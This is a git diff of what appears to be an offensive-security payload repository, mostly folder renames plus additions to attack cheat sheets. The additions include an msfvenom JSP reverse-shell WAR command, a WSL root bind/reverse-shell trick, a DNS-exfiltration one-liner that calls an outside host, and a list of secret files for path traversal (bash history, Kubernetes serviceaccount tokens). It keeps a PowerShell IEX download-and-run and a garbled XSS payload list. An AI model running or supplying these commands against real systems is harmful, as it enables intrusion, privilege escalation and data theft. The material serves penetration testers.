diff --git a/File Inclusion - Path Traversal/Intruders/Web-files.txt b/File Inclusion - Path Traversal/Intruders/Web-files.txt
index e37d8f3..c9736e7 100644
--- a/File Inclusion - Path Traversal/Intruders/Web-files.txt
+++ b/File Inclusion - Path Traversal/Intruders/Web-files.txt
@@ -10,4 +10,5 @@ wp-admin.php
 /include/mysql.php
 /inc/mysql.php
 /sites/defaults/settings.php
-/phpmyadmin/changelog.php
\ No newline at end of file
+/phpmyadmin/changelog.php
+web.config
\ No newline at end of file
diff --git a/File Inclusion - Path Traversal/README.md b/File Inclusion - Path Traversal/README.md
index 2d1c2d9..e9c14b5 100644
--- a/File Inclusion - Path Traversal/README.md
+++ b/File Inclusion - Path Traversal/README.md
@@ -1,13 +1,16 @@
-# Local/Remote File Inclusion +# File Inclusion - Path Traversal The File Inclusion vulnerability allows an attacker to include a file, usually exploiting a "dynamic file inclusion" mechanisms implemented in the target application. +The Path Traversal vulnerability allows an attacker to access a file, usually exploiting a "reading" mechanism implemented in the target application + ## Summary +* [Path Traversal](#path-traversal) * [Basic LFI](#basic-lfi) * [Basic RFI](#basic-rfi) * [LFI / RFI using wrappers](#lfi--rfi-using-wrappers) - * [Wrapper php://filter](l#wrapper-phpfilter) + * [Wrapper php://filter](#wrapper-phpfilter) * [Wrapper zip://](#wrapper-zip) * [Wrapper data://](#wrapper-data) * [Wrapper expect://](#wrapper-expect)
@@ -21,6 +24,9 @@ The File Inclusion vulnerability allows an attacker to include a file, usually e
 * [LFI to RCE via controlled log file](#lfi-to-rce-via-controlled-log-file) * [LFI to RCE via PHP sessions](#lfi-to-rce-via-php-sessions) + +## Path Traversal + Linux - Interesting files to check out : ```powershell
@@ -81,6 +87,13 @@ The following log files are controllable and can be included with an evil payloa
 /var/log/mail ``` +Other easy win files. + +```powershell +/home/$USER/.bash_history +/var/run/secrets/kubernetes.io/serviceaccount +``` + ## Basic LFI ```powershell
diff --git a/Insecure management interface/intruders/springboot_actuator.txt b/Insecure management interface/Intruder/springboot_actuator.txt
similarity index 100%
rename from Insecure management interface/intruders/springboot_actuator.txt
rename to Insecure management interface/Intruder/springboot_actuator.txt
diff --git a/LDAP injection/Intruders/LDAP_FUZZ.txt b/LDAP injection/Intruder/LDAP_FUZZ.txt
similarity index 100%
rename from LDAP injection/Intruders/LDAP_FUZZ.txt
rename to LDAP injection/Intruder/LDAP_FUZZ.txt
diff --git a/LDAP injection/Intruders/LDAP_attributes.txt b/LDAP injection/Intruder/LDAP_attributes.txt
similarity index 100%
rename from LDAP injection/Intruders/LDAP_attributes.txt
rename to LDAP injection/Intruder/LDAP_attributes.txt
diff --git a/Methodology and Resources/Network Discovery.md b/Methodology and Resources/Network Discovery.md
index 85c234c..0ecfaaf 100644
--- a/Methodology and Resources/Network Discovery.md
+++ b/Methodology and Resources/Network Discovery.md
@@ -40,6 +40,8 @@ bettercap -X --proxy --proxy-https -T ```powershell nmap -sn -n --disable-arp-ping 192.168.1.1-254 | grep -v "host down" +-sn : Disable port scanning. Host discovery only. +-n : Never do DNS resolution ``` * Basic NMAP
diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md
index cd8423f..a967976 100644
--- a/Methodology and Resources/Reverse Shell Cheatsheet.md
+++ b/Methodology and Resources/Reverse Shell Cheatsheet.md
@@ -114,6 +114,14 @@ p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while rea
 p.waitFor() ``` +### War + +```java +msfvenom -p java/jsp_shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f war > reverse.war +strings reverse.war | grep jsp # in order to get the name of the file +``` + + ### Lua Linux only
diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md
index d6d844f..93bdb7b 100644
--- a/Methodology and Resources/Windows - Privilege Escalation.md
+++ b/Methodology and Resources/Windows - Privilege Escalation.md
@@ -1,7 +1,5 @@
 # Windows - Privilege Escalation -Almost all of the following commands are from [The Open Source Windows Privilege Escalation Cheat Sheet](https://addaxsoft.com/wpecs/) - ## Windows Version and Configuration ```powershell
@@ -132,7 +130,7 @@ REG QUERY HKCU /F "password" /t REG_SZ /S /K REG QUERY "HKLM\Software\Microsoft\FTH" /V RuleList ``` -### Password in unattend.xml +### Passwords in unattend.xml Location of the unattend.xml files
@@ -167,7 +165,7 @@ Example content The Metasploit module `post/windows/gather/enum_unattend` looks for these files. -## Processes Enum +## Processes Enumeration What processes are running?
@@ -187,36 +185,32 @@ Do you have powershell magic? REG QUERY "HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine" /v PowerShellVersion ``` -## Uploading / Downloading files +## Using PowerSploit's PowerUp -a wget using powershell - -```powershell -powershell -Noninteractive -NoProfile -command "wget https://addaxsoft.com/download/wpecs/wget.exe -UseBasicParsing -OutFile %TEMP%\wget.exe" -``` - -wget using bitsadmin (when powershell is not present) - -```powershell -cmd /c "bitsadmin /transfer myjob /download /priority high https://addaxsoft.com/download/wpecs/wget.exe %TEMP%\wget.exe" -``` - -now you have wget.exe that can be executed from %TEMP%wget for example I will use it here to download netcat - -```powershell -%TEMP%\wget https://addaxsoft.com/download/wpecs/nc.exe -``` - -## Spot the weak service using PowerSploit's PowerUP +Spot the weak service using PowerSploit's PowerUp ```powershell powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks ``` +## Using Windows Subsystem for Linux (WSL) + +Technique borrowed from [Warlockobama's tweet](https://twitter.com/Warlockobama/status/1067890915753132032) + +> With root privileges Windows Subsystem for Linux (WSL) allows users to create a bind shell on any port (no elevation needed). Don't know the root password? No problem just set the default user to root W/ .exe --default-user root. Now start your bind shell or reverse. 
+ +```powershell +wsl whoami +./ubuntun1604.exe config --default-user root +wsl whoami +wsl python -c 'BIND_OR_REVERSE_SHELL_PYTHON_CODE' +``` + ## Thanks to * [The Open Source Windows Privilege Escalation Cheat Sheet by amAK.xyz and @xxByte](https://addaxsoft.com/wpecs/) * [Basic Linux Privilege Escalation](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/) * [Windows Privilege Escalation Fundamentals](http://www.fuzzysecurity.com/tutorials/16.html) * [TOP–10 ways to boost your privileges in Windows systems - hackmag](https://hackmag.com/security/elevating-privileges-to-administrative-and-further/)
-* [The SYSTEM Challenge](https://decoder.cloud/2017/02/21/the-system-challenge/)
\ No newline at end of file
+* [The SYSTEM Challenge](https://decoder.cloud/2017/02/21/the-system-challenge/)
+* [Windows Privilege Escalation Guide - absolomb's security blog](https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/)
\ No newline at end of file
diff --git a/NoSQL injection/Intruders/NoSQL.txt b/NoSQL injection/Intruder/NoSQL.txt
similarity index 100%
rename from NoSQL injection/Intruders/NoSQL.txt
rename to NoSQL injection/Intruder/NoSQL.txt
diff --git a/Open redirect/Open-Redirect-payloads.txt b/Open redirect/Intruder/Open-Redirect-payloads.txt
similarity index 100%
rename from Open redirect/Open-Redirect-payloads.txt
rename to Open redirect/Intruder/Open-Redirect-payloads.txt
diff --git a/Open redirect/open_redirect_wordlist.txt b/Open redirect/Intruder/open_redirect_wordlist.txt
similarity index 100%
rename from Open redirect/open_redirect_wordlist.txt
rename to Open redirect/Intruder/open_redirect_wordlist.txt
diff --git a/Open redirect/openredirects.txt b/Open redirect/Intruder/openredirects.txt
similarity index 100%
rename from Open redirect/openredirects.txt
rename to Open redirect/Intruder/openredirects.txt
diff --git a/Remote commands execution/Intruders/command-execution-unix.txt b/Remote commands execution/Intruder/command-execution-unix.txt
similarity index 100%
rename from Remote commands execution/Intruders/command-execution-unix.txt
rename to Remote commands execution/Intruder/command-execution-unix.txt
diff --git a/Remote commands execution/Intruders/command_exec.txt b/Remote commands execution/Intruder/command_exec.txt
old mode 100755
new mode 100644
similarity index 100%
rename from Remote commands execution/Intruders/command_exec.txt
rename to Remote commands execution/Intruder/command_exec.txt
diff --git a/Remote commands execution/README.md b/Remote commands execution/README.md
index a6717e9..40df955 100644
--- a/Remote commands execution/README.md
+++ b/Remote commands execution/README.md
@@ -152,6 +152,10 @@ Based on the tool from `https://github.com/HoLyVieR/dnsbin` also hosted at dnsbi
 for i in $(ls /) ; do host "http://$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done ``` +```powershell +$(host $(wget -h|head -n1|sed 's/[ ,]/-/g'|tr -d '.').sudo.co.il) +``` + ## Thanks to * [SECURITY CAFÉ - Exploiting Timed Based RCE](https://securitycafe.ro/2017/02/28/time-based-data-exfiltration/)
diff --git a/SQL injection/Intruders/Auth_Bypass.txt b/SQL injection/Intruder/Auth_Bypass.txt
similarity index 100%
rename from SQL injection/Intruders/Auth_Bypass.txt
rename to SQL injection/Intruder/Auth_Bypass.txt
diff --git a/SQL injection/Intruders/Auth_Bypass2.txt b/SQL injection/Intruder/Auth_Bypass2.txt
old mode 100755
new mode 100644
similarity index 100%
rename from SQL injection/Intruders/Auth_Bypass2.txt
rename to SQL injection/Intruder/Auth_Bypass2.txt
diff --git a/SQL injection/Intruders/FUZZDB_MSSQL-WHERE_Time.txt b/SQL injection/Intruder/FUZZDB_MSSQL-WHERE_Time.txt
similarity index 100%
rename from SQL injection/Intruders/FUZZDB_MSSQL-WHERE_Time.txt
rename to SQL injection/Intruder/FUZZDB_MSSQL-WHERE_Time.txt
diff --git a/SQL injection/Intruders/FUZZDB_MSSQL.txt b/SQL injection/Intruder/FUZZDB_MSSQL.txt
similarity index 100%
rename from SQL injection/Intruders/FUZZDB_MSSQL.txt
rename to SQL injection/Intruder/FUZZDB_MSSQL.txt
diff --git a/SQL injection/Intruders/FUZZDB_MSSQL_Enumeration.txt b/SQL injection/Intruder/FUZZDB_MSSQL_Enumeration.txt
similarity index 100%
rename from SQL injection/Intruders/FUZZDB_MSSQL_Enumeration.txt
rename to SQL injection/Intruder/FUZZDB_MSSQL_Enumeration.txt
diff --git a/SQL injection/Intruders/FUZZDB_MYSQL.txt b/SQL injection/Intruder/FUZZDB_MYSQL.txt
similarity index 100%
rename from SQL injection/Intruders/FUZZDB_MYSQL.txt
rename to SQL injection/Intruder/FUZZDB_MYSQL.txt
diff --git a/SQL injection/Intruders/FUZZDB_MySQL-WHERE_Time.txt b/SQL injection/Intruder/FUZZDB_MySQL-WHERE_Time.txt
similarity index 100%
rename from SQL injection/Intruders/FUZZDB_MySQL-WHERE_Time.txt
rename to SQL injection/Intruder/FUZZDB_MySQL-WHERE_Time.txt
diff --git a/SQL injection/Intruders/FUZZDB_MySQL_ReadLocalFiles.txt b/SQL injection/Intruder/FUZZDB_MySQL_ReadLocalFiles.txt
similarity index 100%
rename from SQL injection/Intruders/FUZZDB_MySQL_ReadLocalFiles.txt
rename to SQL injection/Intruder/FUZZDB_MySQL_ReadLocalFiles.txt
diff --git a/SQL injection/Intruders/FUZZDB_Oracle.txt b/SQL injection/Intruder/FUZZDB_Oracle.txt
similarity index 100%
rename from SQL injection/Intruders/FUZZDB_Oracle.txt
rename to SQL injection/Intruder/FUZZDB_Oracle.txt
diff --git a/SQL injection/Intruders/FUZZDB_Postgres_Enumeration.txt b/SQL injection/Intruder/FUZZDB_Postgres_Enumeration.txt
similarity index 100%
rename from SQL injection/Intruders/FUZZDB_Postgres_Enumeration.txt
rename to SQL injection/Intruder/FUZZDB_Postgres_Enumeration.txt
diff --git a/SQL injection/Intruders/Generic_ErrorBased.txt b/SQL injection/Intruder/Generic_ErrorBased.txt
old mode 100755
new mode 100644
similarity index 100%
rename from SQL injection/Intruders/Generic_ErrorBased.txt
rename to SQL injection/Intruder/Generic_ErrorBased.txt
diff --git a/SQL injection/Intruders/Generic_TimeBased.txt b/SQL injection/Intruder/Generic_TimeBased.txt
similarity index 100%
rename from SQL injection/Intruders/Generic_TimeBased.txt
rename to SQL injection/Intruder/Generic_TimeBased.txt
diff --git a/SQL injection/Intruders/Generic_UnionSelect.txt b/SQL injection/Intruder/Generic_UnionSelect.txt
old mode 100755
new mode 100644
similarity index 100%
rename from SQL injection/Intruders/Generic_UnionSelect.txt
rename to SQL injection/Intruder/Generic_UnionSelect.txt
diff --git a/SQL injection/Intruders/SQL-Injection b/SQL injection/Intruder/SQL-Injection
similarity index 100%
rename from SQL injection/Intruders/SQL-Injection
rename to SQL injection/Intruder/SQL-Injection
diff --git a/SQL injection/Intruders/SQLi_Polyglots.txt b/SQL injection/Intruder/SQLi_Polyglots.txt
similarity index 100%
rename from SQL injection/Intruders/SQLi_Polyglots.txt
rename to SQL injection/Intruder/SQLi_Polyglots.txt
diff --git a/SQL injection/Intruders/payloads-sql-blind-MSSQL-INSERT b/SQL injection/Intruder/payloads-sql-blind-MSSQL-INSERT
similarity index 100%
rename from SQL injection/Intruders/payloads-sql-blind-MSSQL-INSERT
rename to SQL injection/Intruder/payloads-sql-blind-MSSQL-INSERT
diff --git a/SQL injection/Intruders/payloads-sql-blind-MSSQL-WHERE b/SQL injection/Intruder/payloads-sql-blind-MSSQL-WHERE
similarity index 100%
rename from SQL injection/Intruders/payloads-sql-blind-MSSQL-WHERE
rename to SQL injection/Intruder/payloads-sql-blind-MSSQL-WHERE
diff --git a/SQL injection/Intruders/payloads-sql-blind-MySQL-INSERT b/SQL injection/Intruder/payloads-sql-blind-MySQL-INSERT
similarity index 100%
rename from SQL injection/Intruders/payloads-sql-blind-MySQL-INSERT
rename to SQL injection/Intruder/payloads-sql-blind-MySQL-INSERT
diff --git a/SQL injection/Intruders/payloads-sql-blind-MySQL-ORDER_BY b/SQL injection/Intruder/payloads-sql-blind-MySQL-ORDER_BY
similarity index 100%
rename from SQL injection/Intruders/payloads-sql-blind-MySQL-ORDER_BY
rename to SQL injection/Intruder/payloads-sql-blind-MySQL-ORDER_BY
diff --git a/SQL injection/Intruders/payloads-sql-blind-MySQL-WHERE b/SQL injection/Intruder/payloads-sql-blind-MySQL-WHERE
similarity index 100%
rename from SQL injection/Intruders/payloads-sql-blind-MySQL-WHERE
rename to SQL injection/Intruder/payloads-sql-blind-MySQL-WHERE
diff --git a/SSRF injection/ip.py b/SSRF injection/Files/ip.py
similarity index 100%
rename from SSRF injection/ip.py
rename to SSRF injection/Files/ip.py
diff --git a/SSRF injection/Parser & Curl < 7.54.png b/SSRF injection/Images/Parser & Curl < 7.54.png
similarity index 100%
rename from SSRF injection/Parser & Curl < 7.54.png
rename to SSRF injection/Images/Parser & Curl < 7.54.png
diff --git a/SSRF injection/SSRF_Parser.png b/SSRF injection/Images/SSRF_Parser.png
similarity index 100%
rename from SSRF injection/SSRF_Parser.png
rename to SSRF injection/Images/SSRF_Parser.png
diff --git a/SSRF injection/WeakParser.jpg b/SSRF injection/Images/WeakParser.jpg
similarity index 100%
rename from SSRF injection/WeakParser.jpg
rename to SSRF injection/Images/WeakParser.jpg
diff --git a/SSRF injection/README.md b/SSRF injection/README.md
index dfcdb30..3d645b9 100644
--- a/SSRF injection/README.md
+++ b/SSRF injection/README.md
@@ -168,7 +168,7 @@ http://127.1.1.1:80:\@@127.2.2.2:80/ http://127.1.1.1:80#\@127.2.2.2:80/ ``` -![https://github.com/swisskyrepo/PayloadsAllTheThings/raw/master/SSRF%20injection/SSRF_Parser.png](https://github.com/swisskyrepo/PayloadsAllTheThings/raw/master/SSRF%20injection/WeakParser.jpg) +![https://github.com/swisskyrepo/PayloadsAllTheThings/raw/master/SSRF%20injection/Images/SSRF_Parser.png](https://github.com/swisskyrepo/PayloadsAllTheThings/raw/master/SSRF%20injection/Images/WeakParser.jpg) ## SSRF via URL Scheme
diff --git a/Server Side Template injections/serverside.png b/Server Side Template injections/Images/serverside.png
similarity index 100%
rename from Server Side Template injections/serverside.png
rename to Server Side Template injections/Images/serverside.png
diff --git a/Server Side Template injections/Intruders/JHADDIX_SSI_Injection.txt b/Server Side Template injections/Intruder/JHADDIX_SSI_Injection.txt
similarity index 100%
rename from Server Side Template injections/Intruders/JHADDIX_SSI_Injection.txt
rename to Server Side Template injections/Intruder/JHADDIX_SSI_Injection.txt
diff --git a/Server Side Template injections/Intruders/ssi_quick.txt b/Server Side Template injections/Intruder/ssi_quick.txt
old mode 100755
new mode 100644
similarity index 100%
rename from Server Side Template injections/Intruders/ssi_quick.txt
rename to Server Side Template injections/Intruder/ssi_quick.txt
diff --git a/Tar commands execution/--checkpoint-action=exec=sh shell.sh b/Tar commands execution/Files/--checkpoint-action=exec=sh shell.sh
old mode 100755
new mode 100644
similarity index 100%
rename from Tar commands execution/--checkpoint-action=exec=sh shell.sh
rename to Tar commands execution/Files/--checkpoint-action=exec=sh shell.sh
diff --git a/Tar commands execution/--checkpoint=1 b/Tar commands execution/Files/--checkpoint=1
old mode 100755
new mode 100644
similarity index 100%
rename from Tar commands execution/--checkpoint=1
rename to Tar commands execution/Files/--checkpoint=1
diff --git a/Tar commands execution/shell.sh b/Tar commands execution/Files/shell.sh
old mode 100755
new mode 100644
similarity index 100%
rename from Tar commands execution/shell.sh
rename to Tar commands execution/Files/shell.sh
diff --git a/Traversal directory/deep_traversal.txt b/Traversal directory/Intruder/deep_traversal.txt
old mode 100755
new mode 100644
similarity index 100%
rename from Traversal directory/deep_traversal.txt
rename to Traversal directory/Intruder/deep_traversal.txt
diff --git a/Traversal directory/directory_traversal.txt b/Traversal directory/Intruder/directory_traversal.txt
old mode 100755
new mode 100644
similarity index 100%
rename from Traversal directory/directory_traversal.txt
rename to Traversal directory/Intruder/directory_traversal.txt
diff --git a/Traversal directory/dotdotpwn.txt b/Traversal directory/Intruder/dotdotpwn.txt
old mode 100755
new mode 100644
similarity index 100%
rename from Traversal directory/dotdotpwn.txt
rename to Traversal directory/Intruder/dotdotpwn.txt
diff --git a/Traversal directory/traversals-8-deep-exotic-encoding.txt b/Traversal directory/Intruder/traversals-8-deep-exotic-encoding.txt
similarity index 100%
rename from Traversal directory/traversals-8-deep-exotic-encoding.txt
rename to Traversal directory/Intruder/traversals-8-deep-exotic-encoding.txt
diff --git a/XSS injection/Intruders/jsonp_endpoint.txt b/XSS injection/Intruders/jsonp_endpoint.txt
new file mode 100644
index 0000000..e514d81
--- /dev/null
+++ b/XSS injection/Intruders/jsonp_endpoint.txt
@@ -0,0 +1,54 @@
+#Google.com:
+">
+">
+">
+">
+#Blogger.com:
+">
+#Yandex:
+">
+">
+#VK.com:
+">
+#Marketo.com
+">
+">
+#AlibabaGroup:
+">
+">
+">
+">
+">
+">
+">
+#Uber.com:
+">
+#AOL/Yahoo
+">
+">
+">
+">
+">
+">
+">
+#Twitter.com:
+">
+">
+">
+#Others:
+">
+">
+">
+">
+">
+">
+">
+">
+">
+">
+">
+">
+#GoogleAPI's
+">
+">
+ng-app"ng-csp ng-click=$event.view.alert(1337)>
\ No newline at end of file
diff --git a/XSS injection/README.md b/XSS injection/README.md
index 82f8620..3ce0402 100644
--- a/XSS injection/README.md
+++ b/XSS injection/README.md
@@ -778,6 +778,8 @@ Check the CSP on [https://csp-evaluator.withgoogle.com](https://csp-evaluator.wi